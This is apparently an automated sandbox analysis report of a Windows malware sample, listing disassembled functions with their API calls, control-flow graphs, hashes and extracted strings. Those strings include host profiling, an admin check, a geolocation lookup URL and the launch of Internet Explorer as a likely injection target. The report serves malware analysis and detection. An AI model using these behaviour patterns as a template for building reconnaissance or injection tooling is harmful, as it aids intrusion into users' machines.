                                                                  • Instruction Fuzzy Hash: D42198F19002087BD720DF959C85EFFB77CEB45754F0041BAFA08A6281D6B40F8546A5
                                                                  Function 00404560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 292 404560-404578 293 404586-40459f 292->293 294 40457a-404583 292->294 295 4045a0-4045a6 293->295 294->293 296 4046ca-4046e3 295->296 297 4045ac-4045b3 call 404470 295->297 298 404732-4047b1 call 4035f0 296->298 299 4046e5-4046f7 296->299 297->296 304 4045b9-4045e6 _snprintf 297->304 299->295 301 4046fd-404705 299->301 306 4045e8 304->306 307 4045ed-40461b CreateFileMappingA 304->307 306->307 307->301 308 404621-40465a MapViewOfFile 307->308 309 404660-4046c7 call 4035f0 308->309 310 404706-404731 CloseHandle 308->310 309->296
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 004045D5
                                                                  • CreateFileMappingA.KERNEL32 ref: 004045FD
                                                                  • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000,?,?,00010000,EDB88320,00000000), ref: 00404636
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateMappingView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 1261873476-1933919280
                                                                  • Opcode ID: 6e13bc5d45006f82416d3cdcea8d38f2c487028171e142ebaa6c825697568e61
                                                                  • Instruction ID: 2d1e0240a6dfd40e8f44cae7654bdf04abfd26f7ecc1aa1406215c6cd6b15d06
                                                                  • Opcode Fuzzy Hash: 6e13bc5d45006f82416d3cdcea8d38f2c487028171e142ebaa6c825697568e61
                                                                  • Instruction Fuzzy Hash: D761D1B16002029BD325CF18C881BB6B7E5FF84304F28857DE7869B3C5D779A9A0DB84
                                                                  Function 00404470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 320 404470-404488 321 404544-40455b 320->321 322 40448e-4044e0 _snprintf OpenFileMappingA 320->322 323 404530-404535 322->323 324 4044e2-404514 MapViewOfFile 322->324 325 404536-40453d 324->325 326 404516-404528 CloseHandle 324->326 325->321 326->323
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 004044A7
                                                                  • OpenFileMappingA.KERNEL32 ref: 004044BD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 004044F0
                                                                  • CloseHandle.KERNEL32(?), ref: 0040451B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleMappingOpenView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 460513966-1933919280
                                                                  • Opcode ID: 61360a09ed2803673541f69b6359b1b42ff6b64d8add12aeef0c8aaee9439e27
                                                                  • Instruction ID: 26658a841a1a3fe0c79036ba11ef289e621c3937bfc9ce10cfabfd1764c09018
                                                                  • Opcode Fuzzy Hash: 61360a09ed2803673541f69b6359b1b42ff6b64d8add12aeef0c8aaee9439e27
                                                                  • Instruction Fuzzy Hash: D421CFB26507069BD332CF08DC89BB2B3E8EB84304F40857DA74297685DB7DB8609B44
                                                                  Function 00364470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 313 364470-364488 314 364544-36455b 313->314 315 36448e-3644e0 _snprintf OpenFileMappingA 313->315 316 3644e2-364514 MapViewOfFile 315->316 317 364530-364535 315->317 318 364536-36453d 316->318 319 364516-364528 CloseHandle 316->319 318->314 319->317
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 003644A7
                                                                  • OpenFileMappingA.KERNEL32 ref: 003644BD
                                                                  • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 003644F0
                                                                  • CloseHandle.KERNEL32(?), ref: 0036451B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleMappingOpenView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 460513966-1933919280
                                                                  • Opcode ID: 09d3326afe10ba9e3c1556f8076e5b3272bdbf8ed317bf4125bb0d0c1dd3eab7
                                                                  • Instruction ID: b30cc3a35b5f5323400945fff8a605ffdcde548691ac8cee4e6df1d32a149de9
                                                                  • Opcode Fuzzy Hash: 09d3326afe10ba9e3c1556f8076e5b3272bdbf8ed317bf4125bb0d0c1dd3eab7
                                                                  • Instruction Fuzzy Hash: 3F21A1B26507068BD332DF18DD89B72B3E8EB84304F54857CE74697689DB79B860DB40
                                                                  Function 00403F90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNEL32(?,00000000,kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,00404D5C), ref: 00404007
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 1721193555-192647395
                                                                  • Opcode ID: 7e7b4dbe53be81b1ab4fbd66654e37c01d7587515854f1dbf4a1af964dd22a61
                                                                  • Instruction ID: 791685a111bc0c6a63c3f367ca410b207a7afd2459317f5c88c0cf7fc5170385
                                                                  • Opcode Fuzzy Hash: 7e7b4dbe53be81b1ab4fbd66654e37c01d7587515854f1dbf4a1af964dd22a61
                                                                  • Instruction Fuzzy Hash: AD01D7F1C083099ADB18EFAAA94129E7AF8AB48305F14947FA108B27A0D7795740CB5D
                                                                  Function 00363F90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 356 363f90-363f9d 357 363f9f-363fa6 call 363890 356->357 358 363fab-363fb6 call 3635e0 356->358 357->358 363 364018-36401b 358->363 364 363fb8-364001 call 3635e0 call 363890 call 363750 358->364 364->363 371 364003-364012 GetNativeSystemInfo 364->371 371->363
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNEL32(?,00000000,kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,00364D5C), ref: 00364007
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 1721193555-192647395
                                                                  • Opcode ID: b0a350e98190940a74d8676a70d061d02807f0e69dd023b19da8d82e8d8b11b3
                                                                  • Instruction ID: 0ab82d23c1c70e3812e367bb40e75695c242a2224af08a400e748f2b43502662
                                                                  • Opcode Fuzzy Hash: b0a350e98190940a74d8676a70d061d02807f0e69dd023b19da8d82e8d8b11b3
                                                                  • Instruction Fuzzy Hash: EB010CB1C093099ACF1AEFA9A90119DBBF8AB08300F00846FE008A7794DB765740CB59
                                                                  Function 004068B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00449E78,00000026,00000001), ref: 004068BB
                                                                  • PathAppendW.SHLWAPI(00449E78,Internet Explorer\iexplore.exe), ref: 004068D0
                                                                  Strings
                                                                  • Internet Explorer\iexplore.exe, xrefs: 004068C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFolderSpecial
                                                                  • String ID: Internet Explorer\iexplore.exe
                                                                  • API String ID: 2921508639-3330628412
                                                                  • Opcode ID: a335c27866ef2bae4a09bd65796f17ffb87ef9b2b152ac25fa9b155a7e5f3500
                                                                  • Instruction ID: 5cef3b0c70042a609627615c00b92cc7df0f9fd812bc402db1849e33514db50e
                                                                  • Opcode Fuzzy Hash: a335c27866ef2bae4a09bd65796f17ffb87ef9b2b152ac25fa9b155a7e5f3500
                                                                  • Instruction Fuzzy Hash: C1C0C9253D030026E61057144D8ABC22241A774B42FA081A2B202A41E0D3ED4881200E
                                                                  Function 00404410 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(0000047A,00000000,00000000,?,?,004057DF,?,00000000,00000000,(mA,?,?,?,?), ref: 00404430
                                                                  • GetLastError.KERNEL32(?,004057DF,?,00000000,00000000,(mA,?,?,?,?,?,?,?,?,?,00406010), ref: 0040443C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastOpenProcess
                                                                  • String ID:
                                                                  • API String ID: 919517065-0
                                                                  • Opcode ID: fa21c6a546f7665fcd9ed43f9efed41023edd3376a29bcc8ba8710a23aa8e6cc
                                                                  • Instruction ID: 0bc3cb10323a7717dc5adc9e31d89cd4ea32d10fdc1a18813f8fb21e42cac110
                                                                  • Opcode Fuzzy Hash: fa21c6a546f7665fcd9ed43f9efed41023edd3376a29bcc8ba8710a23aa8e6cc
                                                                  • Instruction Fuzzy Hash: E2F089766401146BD7106BB5BC05EAB779CDBC4395B044036FB0CD3750D5749900C6A9
                                                                  Function 0040A990 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004068B0: SHGetSpecialFolderPathW.SHELL32(00000000,00449E78,00000026,00000001), ref: 004068BB
                                                                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000010,00000000,00000000,00000044,?), ref: 0040A9ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFolderPathProcessSpecial
                                                                  • String ID: D
                                                                  • API String ID: 2112413627-2746444292
                                                                  • Opcode ID: 835663ffea5eee61987b87af985e6251e3cfc9ab47c548749ea0a7200375bfe3
                                                                  • Instruction ID: 2230c3a86171d276420a58e3022d5c119255fdd01a2dfc7308d6bdfabee464bf
                                                                  • Opcode Fuzzy Hash: 835663ffea5eee61987b87af985e6251e3cfc9ab47c548749ea0a7200375bfe3
                                                                  • Instruction Fuzzy Hash: 5501A272A4031876EB20DAD58C02FEF7B2C9B04B14F14415AFB097B1C5EAB969548399
                                                                  Function 00403810 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403819
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403820
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocateProcess
                                                                  • String ID:
                                                                  • API String ID: 1357844191-0
                                                                  • Opcode ID: baacf28b722c80f1d97f843805acf95dbcbf5d56b1c562bccd72c9ce7d042db9
                                                                  • Instruction ID: a45d09a1cc6a3363d10043362d83d70e5a190bee85998ff93397d4509dba2002
                                                                  • Opcode Fuzzy Hash: baacf28b722c80f1d97f843805acf95dbcbf5d56b1c562bccd72c9ce7d042db9
                                                                  • Instruction Fuzzy Hash: B6C09B75144708BBE7005BF4EC0DFD5775CD70C612F408010FB1DC6260C671A4404765
                                                                  Function 00403830 Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00402D43,?,00000100,?,(mA,?,?,00405730,?,00008000,?,00000000), ref: 0040384F
                                                                  • HeapReAlloc.KERNEL32(00000000,?,00402D43,?,00000100,?,(mA,?,?,00405730,?,00008000,?,00000000,00000000,?), ref: 00403856
                                                                    • Part of subcall function 00403810: GetProcessHeap.KERNEL32(00000000,00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403819
                                                                    • Part of subcall function 00403810: RtlAllocateHeap.NTDLL(00000000,?,00404046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00403820
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocAllocate
                                                                  • String ID:
                                                                  • API String ID: 1154092256-0
                                                                  • Opcode ID: 6bd858bd068ee9d502431d5df6c01d659be59e0546fa1d939306a6d2d7cd13d1
                                                                  • Instruction ID: 59b5348fdb67c635b3c04655c960773e447a90c549b0dc0aa948b3716d5f6312
                                                                  • Opcode Fuzzy Hash: 6bd858bd068ee9d502431d5df6c01d659be59e0546fa1d939306a6d2d7cd13d1
                                                                  • Instruction Fuzzy Hash: 20D05BB65002087BEF00AFE4FC49EAA3B9CDB48615F44C065FB0DC7650D635E9008755
                                                                  Function 004037F0 Relevance: 2.5, APIs: 2, Instructions: 10memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,0040428C,?,0040428C,00000000), ref: 004037F9
                                                                  • HeapFree.KERNEL32(00000000,?,0040428C), ref: 00403800
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$FreeProcess
                                                                  • String ID:
                                                                  • API String ID: 3859560861-0
                                                                  • Opcode ID: 38296f158267b1ebc2d54f92307be93bf0282fd4a93306e7a804a0f77be8d180
                                                                  • Instruction ID: 9b6b654b7b719752d2f106a16efdcbfd3e8252ceaa65f6ec648e1aaeb866a5ce
                                                                  • Opcode Fuzzy Hash: 38296f158267b1ebc2d54f92307be93bf0282fd4a93306e7a804a0f77be8d180
                                                                  • Instruction Fuzzy Hash: 7DC09B7514430CBBDB005BE4EC0DFD5775CE70C641F40C010F70DC6160C671A4004765
                                                                  Function 004030C0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlInitializeCriticalSection.NTDLL(EDB8830C,00010000,EDB88320), ref: 004030EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalInitializeSection
                                                                  • String ID:
                                                                  • API String ID: 32694325-0
                                                                  • Opcode ID: 1ec5181adca8729c0b4d054fe9820a29ef9486c1db9cb2112205f76210c3a441
                                                                  • Instruction ID: f882fd944f5205b9f6397f97525e7b153576b9ce51f1a3dc64d4837ac45731b1
                                                                  • Opcode Fuzzy Hash: 1ec5181adca8729c0b4d054fe9820a29ef9486c1db9cb2112205f76210c3a441
                                                                  • Instruction Fuzzy Hash: 88E04F31501725ABDB205F189C02B8B7B9CAF04751F044036FD08A7782E774EA0047D8
                                                                  Function 004042A0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWow64Process.KERNELBASE(00000000,00000000,?,?,00404309,00000000,00000000,00000000,00000000), ref: 004042B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessWow64
                                                                  • String ID:
                                                                  • API String ID: 2092917072-0
                                                                  • Opcode ID: 22b2903508e7e7fa1c50625dbd83016fe9164760df05acc8bbb1288eadc8f59e
                                                                  • Instruction ID: 2da779ddd16944dc38780d38c887f2d19e27236ab7e8ad125095d7b4c023789d
                                                                  • Opcode Fuzzy Hash: 22b2903508e7e7fa1c50625dbd83016fe9164760df05acc8bbb1288eadc8f59e
                                                                  • Instruction Fuzzy Hash: 5AE08CB072021CABDB30CB90DC04BAA73ACD740349F0002FEBE0892690E63ADE44CB94
                                                                  Function 00406850 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00449A68,0000001A,00000001), ref: 0040685B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FolderPathSpecial
                                                                  • String ID:
                                                                  • API String ID: 994120019-0
                                                                  • Opcode ID: 719606b9710c54ecf9254484d1c63c70ec4c7ebb7d3140fe275e23f379cb05b4
                                                                  • Instruction ID: dec42c56a20302e498460b79d113f6e88d44876573d08d8c81d581d4537f89bd
                                                                  • Opcode Fuzzy Hash: 719606b9710c54ecf9254484d1c63c70ec4c7ebb7d3140fe275e23f379cb05b4
                                                                  • Instruction Fuzzy Hash: 3BB092313F434521FA101A788C07FC121486325F03F9082617282F80E0C2DC8D80A20B

                                                                  Non-executed Functions

                                                                  Function 0040B480 Relevance: 66.9, APIs: 28, Strings: 10, Instructions: 363memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040B4A2
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                  • lstrcpyA.KERNEL32(?,00411335), ref: 0040B51A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B536
                                                                  • GetVersionExA.KERNEL32(?), ref: 0040B550
                                                                  • lstrcpyA.KERNEL32(?,ERR), ref: 0040B5F5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B60D
                                                                  • strstr.MSVCRT ref: 0040B641
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B650
                                                                  • lstrlenA.KERNEL32(-00000004), ref: 0040B65F
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0040B67D
                                                                  • lstrcmpA.KERNEL32(-00000004,00412BE4), ref: 0040B6A8
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0040B6C5
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0040B719
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B74A
                                                                    • Part of subcall function 00401BA0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401BC5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B75B
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B76E
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0040B781
                                                                  • _snprintf.MSVCRT ref: 0040B796
                                                                  • _snprintf.MSVCRT ref: 0040B7AB
                                                                  • lstrcpyA.KERNEL32(?,00412C0C), ref: 0040B7CD
                                                                  • _snprintf.MSVCRT ref: 0040B7FC
                                                                  • _snprintf.MSVCRT ref: 0040B863
                                                                  • _snprintf.MSVCRT ref: 0040B878
                                                                  • lstrcpyA.KERNEL32(?,00412C0C), ref: 0040B89A
                                                                  • _snprintf.MSVCRT ref: 0040B8C9
                                                                  • _snprintf.MSVCRT ref: 0040B8E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040B8F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$AllocHeap$lstrcpy$lstrlen$memset$InfoLocaleTime$??3@FileSystemVersion_vsnprintflstrcmpstrstr
                                                                  • String ID: 2K3$2K8$<br>$ERR$VIS$[%s{%s%s{%s$admin$http://api.wipmania.com/$isadmin$n%s[%s{%s%s{%s
                                                                  • API String ID: 124843797-3058427118
                                                                  • Opcode ID: 5285a643bed9aead735775b7b57751fab33f7591493ea2bf5bbeeb1044d9239c
                                                                  • Instruction ID: 0949af502ffcd9305bdd3bfb05b668ef187342c133c2638009f109ee02911516
                                                                  • Opcode Fuzzy Hash: 5285a643bed9aead735775b7b57751fab33f7591493ea2bf5bbeeb1044d9239c
                                                                  • Instruction Fuzzy Hash: 6CC161B1A44305BBD724DF51CC81FA77378EB44708F10896EF246A62D0E7B8E9848B9D
                                                                  Function 0036B480 Relevance: 66.9, APIs: 28, Strings: 10, Instructions: 363memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036B4A2
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                  • lstrcpyA.KERNEL32(?,00371335), ref: 0036B51A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B536
                                                                  • GetVersionExA.KERNEL32(?), ref: 0036B550
                                                                  • lstrcpyA.KERNEL32(?,ERR), ref: 0036B5F5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B60D
                                                                  • strstr.MSVCRT ref: 0036B641
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036B650
                                                                  • lstrlenA.KERNEL32(-00000004), ref: 0036B65F
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0036B67D
                                                                  • lstrcmpA.KERNEL32(-00000004,00372BE4), ref: 0036B6A8
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 0036B6C5
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 0036B719
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B74A
                                                                    • Part of subcall function 00361BA0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00361BC5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B75B
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B76E
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 0036B781
                                                                  • _snprintf.MSVCRT ref: 0036B796
                                                                  • _snprintf.MSVCRT ref: 0036B7AB
                                                                  • lstrcpyA.KERNEL32(?,00372C0C), ref: 0036B7CD
                                                                  • _snprintf.MSVCRT ref: 0036B7FC
                                                                  • _snprintf.MSVCRT ref: 0036B863
                                                                  • _snprintf.MSVCRT ref: 0036B878
                                                                  • lstrcpyA.KERNEL32(?,00372C0C), ref: 0036B89A
                                                                  • _snprintf.MSVCRT ref: 0036B8C9
                                                                  • _snprintf.MSVCRT ref: 0036B8E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036B8F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$AllocHeap$lstrcpy$lstrlen$memset$InfoLocaleTime$??3@FileSystemVersion_vsnprintflstrcmpstrstr
                                                                  • String ID: 2K3$2K8$<br>$ERR$VIS$[%s{%s%s{%s$admin$http://api.wipmania.com/$isadmin$n%s[%s{%s%s{%s
                                                                  • API String ID: 124843797-3058427118
                                                                  • Opcode ID: 38736b8b97e97289167f21de5f286e04aa3c963098bc85c7f20d7e79cd6cb2f5
                                                                  • Instruction ID: 46366e9af9fb6619ad18183ff048b9bfecb3083293a1614b67bec970f01eb473
                                                                  • Opcode Fuzzy Hash: 38736b8b97e97289167f21de5f286e04aa3c963098bc85c7f20d7e79cd6cb2f5
                                                                  • Instruction Fuzzy Hash: 08C173B1A40705ABD736DB94CC82EABB3BCAB54704F14C91CF346AB584D7B4E9848F61
                                                                  Function 00401EA0 Relevance: 37.7, APIs: 25, Instructions: 195fileencryptionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00401ECD
                                                                  • GetLastError.KERNEL32 ref: 00401EDA
                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00401EF5
                                                                  • GetLastError.KERNEL32 ref: 00401EFF
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AcquireCloseContextCreateCryptFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2213256293-0
                                                                  • Opcode ID: e4a31331d112a67bdcebc61a7cb6164f8bfe0d5aecb2f3aaefa7239b3fa62299
                                                                  • Instruction ID: 29da55e24c53a6960bedebd6ee296a713d47ef44fcd8d90534e508c4660d2c9c
                                                                  • Opcode Fuzzy Hash: e4a31331d112a67bdcebc61a7cb6164f8bfe0d5aecb2f3aaefa7239b3fa62299
                                                                  • Instruction Fuzzy Hash: B4517F76A00108BFDB109BE4EC88AFFBB7CEB49355F10856AFB05D2260D77589418B68
                                                                  Function 00361EA0 Relevance: 37.7, APIs: 25, Instructions: 195fileencryptionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00361ECD
                                                                  • GetLastError.KERNEL32 ref: 00361EDA
                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00361EF5
                                                                  • GetLastError.KERNEL32 ref: 00361EFF
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00361F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AcquireCloseContextCreateCryptFileHandle
